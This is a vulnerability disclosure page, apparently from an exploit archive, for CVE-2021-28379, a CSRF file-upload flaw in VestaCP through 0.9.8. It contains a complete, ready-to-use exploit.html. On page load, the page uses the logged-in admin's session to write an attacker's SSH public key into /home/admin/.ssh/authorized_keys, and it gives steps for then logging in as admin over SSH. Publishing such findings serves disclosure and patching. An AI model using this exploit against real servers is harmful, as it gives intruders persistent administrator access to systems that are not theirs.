VestaCP 0.9.8 File Upload CSRF

Credit: Fady Othman
Risk: High
Local: No
Remote: Yes

CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: VestaCP 0.9.8 - File Upload CSRF # Exploit Author: Fady Othman # Date: 16-03-2021 # Vendor Homepage: # Software Link: # Version: Vesta Control Panel (aka VestaCP) through 0.9.8-27 and myVesta through 0.9.8-26-39 # CVE ID: CVE-2021-28379 # Patch: ## Description I found that the checks performed by the upload functionality are insufficient, the upload functionality is vulnerable to CSRF, in addition it allows uploading files and creating folders under "/tmp" and under the home folder (usually "/home/admin"), the later is the one that is important for this exploit to work. I was able to use this to create a ".ssh" folder in the admin home and upload "authorized_keys" file which allowed me to access the server later as "admin" using SSH. Since this relies on a *CSRF* the admin has to visit a link, please note that *sshd* is already installed by *VestaCP* when using the default installation script so no need to install it, also please note that files can be replaced so even if the admin has already added "authorized_keys" file, it will be replaced with the attacker's file. Affected endpoint: "/upload/index.php", i.e. "/upload/index.php?dir=/home/admin/.ssh/" ## Steps to reproduce. 1. Install the latest version of VestaCP in your machine by following the instructions at 2. Login as the admin in Firefox, then open "exploit.html". 3. ssh into the machine using 'ssh -i id_rsa admin@victimmachine', now you have access as admin. # exploit.html <html> <head> <script> function exploit() { var mystring = `ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCnXyu8AsFjbuE5YMUa74PrNkO9coGWnw59v/cSVMgOZVpx+UziT0BRFurhVkyujTCXdz6OlN4yFZjCVMbAgZ7/liNu9ecGSGNcUTC+Br5YawlG9QICEaJ/bK32+luKdM1c5ONbRby+ARFsC9+iZu6IkAPnSRntbNgDZpuej/cKfm85EnvdQPAijvs4+899w2+rGvhSQ0wH4l1KNlV1yVoAsg0PFYGDnbygGA5Eo4k9LHwa2Hsm5b2Q5GhqlEUCgYFOjScuORczwhctVtp4VWKXiFoMLJupNhot/OqUXkoNgE6UUd75XcLNGMBiyfLpfXO2u1sGsw5nTiKvNn+1YdC7AKHWBjxl3wDY8hMf/gcveV4Nh45mMUu0p6kptDdVhELeeys8euHiTWOk+FLCKkps9eLiyl8gQUfWcFVj0dgqYVJne2S1U33wnofRhj0fGWAJf14xHhwnTi7u58u+0U1NJchOTHAaeX1Swqk2J34Ny9GwD01a71DFIIcIbgcef6c= fady@fady-Lenovo-Legion-Y530-15ICH-1060`; var fileContent = new Blob([mystring], { type: 'text/plain' }); myFormData = new FormData(); myFormData.append("files", fileContent, "authorized_keys"); fetch("https://localhost:8083/upload/index.php?dir=/home/admin/.ssh/", { method: "post", body: myFormData, credentials: "include" }); } </script> </head> <body onload="exploit();"> </body> </html>

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021,


Back to Top